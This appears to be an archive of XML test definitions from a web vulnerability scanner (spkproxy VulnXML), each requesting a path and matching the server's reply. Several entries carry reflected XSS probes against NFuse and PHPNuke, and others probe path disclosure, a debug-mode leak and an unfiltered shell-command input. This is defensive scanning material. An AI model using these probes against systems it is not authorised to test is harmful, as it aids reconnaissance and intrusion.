0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /javadoc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-34.xml0100664000076500007650000000725307566204543017502 0ustar davedave (index.html.es) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.es HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-350.xml0100664000076500007650000000705607566204543017564 0ustar davedave (javax) "Java class files may be browsable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /javax HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of 200 index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-351.xml0100664000076500007650000000703007566204543017555 0ustar davedave (jdbc/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jdbc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-352.xml0100664000076500007650000000714407566204543017564 0ustar davedave (jigsaw/) "Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jigsaw/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-353.xml0100664000076500007650000000714407566204543017565 0ustar davedave (Jigsaw/) "Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Jigsaw/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-354.xml0100664000076500007650000000755207566204543017571 0ustar davedave (launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>) "NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-355.xml0100664000076500007650000000755207566204543017572 0ustar davedave (launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>) "NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-356.xml0100664000076500007650000000702607566204543017567 0ustar davedave (lib/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lib/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-357.xml0100664000076500007650000000703607566204543017571 0ustar davedave (library/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /library/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-358.xml0100664000076500007650000000703307566204543017567 0ustar davedave (log.htm) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /log.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-359.xml0100664000076500007650000000703507566204543017572 0ustar davedave (log.html) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /log.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-35.xml0100664000076500007650000000725307566204543017503 0ustar davedave (index.html.et) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.et HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-360.xml0100664000076500007650000000703307566204543017560 0ustar davedave (log.txt) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /log.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-361.xml0100664000076500007650000000702607566204543017563 0ustar davedave (log/) "Ahh...log information...fun!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /log/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-362.xml0100664000076500007650000000703307566204543017562 0ustar davedave (logfile) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfile HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-363.xml0100664000076500007650000000704307566204543017564 0ustar davedave (logfile.htm) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfile.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-364.xml0100664000076500007650000000704507566204543017567 0ustar davedave (logfile.html) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfile.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-365.xml0100664000076500007650000000704307566204543017566 0ustar davedave (logfile.txt) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfile.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-366.xml0100664000076500007650000000703607566204543017571 0ustar davedave (logfile/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfile/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-367.xml0100664000076500007650000000704007566204543017565 0ustar davedave (logfiles/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logfiles/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-368.xml0100664000076500007650000000704307566204543017571 0ustar davedave (logger.html) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logger.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-369.xml0100664000076500007650000000703407566204543017572 0ustar davedave (logger/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logger/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-36.xml0100664000076500007650000000725307566204543017504 0ustar davedave (index.html.fr) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.fr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-370.xml0100664000076500007650000000703607566204543017564 0ustar davedave (logging/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logging/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-371.xml0100664000076500007650000000703207566204543017561 0ustar davedave (login/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /login/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-372.xml0100664000076500007650000000703507566204543017565 0ustar davedave (logs.txt) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logs.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-373.xml0100664000076500007650000000720707566204543017567 0ustar davedave (lpt9.xtp) "Resin 2.1 reveals the server path when a a DOS device is requested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lpt9.xtp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ java\.io\.FileNotFoundException\: 200 java\.io\.FileNotFoundException\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-374.xml0100664000076500007650000000713707566204543017572 0ustar davedave (manual.php) "Does not filter input before passing to shell command. Try 'ls -l' as the man page entry." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manual.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-375.xml0100664000076500007650000000703307566204543017566 0ustar davedave (manual/) "Web server manual? tsk tsk." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manual/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-376.xml0100664000076500007650000000714507566204543017573 0ustar davedave (midicart.mdb) "MIDICART database is available for browsing. This should not be allowed via the web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /midicart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-377.xml0100664000076500007650000000706207566204543017572 0ustar davedave (mlog.phtml) "Remote file read vulnerability CVE-1999-0346" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mlog.phtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-378.xml0100664000076500007650000000761607566204543017600 0ustar davedave (modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-379.xml0100664000076500007650000000723607566204543017577 0ustar davedave (modules.php?name=Downloads&d_op=viewdownload) "PHPNuke allows file system paths to be revealed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening 200 Failed opening 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-37.xml0100664000076500007650000000727707566204543017513 0ustar davedave (index.html.he.iso8859-8) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.he.iso8859-8 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-380.xml0100664000076500007650000000723007566204543017561 0ustar davedave (modules.php?name=Downloads&d_op=viewdownload) "PHPNuke allows file system paths to be revealed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Fatal error 200 Fatal error 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-381.xml0100664000076500007650000000764407566204543017573 0ustar davedave (modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>") "This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-382.xml0100664000076500007650000000732707566204543017572 0ustar davedave (modules.php?name=Members_List&sql_debug=1) "The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Members_List&sql_debug=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the 